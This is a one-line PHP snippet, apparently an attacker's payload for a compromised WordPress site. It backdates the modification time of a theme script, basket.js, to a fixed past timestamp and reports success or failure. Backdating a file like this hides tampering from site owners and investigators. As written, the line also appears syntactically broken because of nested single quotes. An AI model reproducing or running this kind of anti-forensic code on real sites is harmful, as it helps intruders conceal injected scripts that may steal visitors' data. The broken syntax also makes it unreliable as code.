<?php $path = '{$_SERVER['DOCUMENT_ROOT']}/wp-content/themes/daniel/basket.js'; if (@touch($path, 1559019814)) { die('!success!'); } die('!failed!');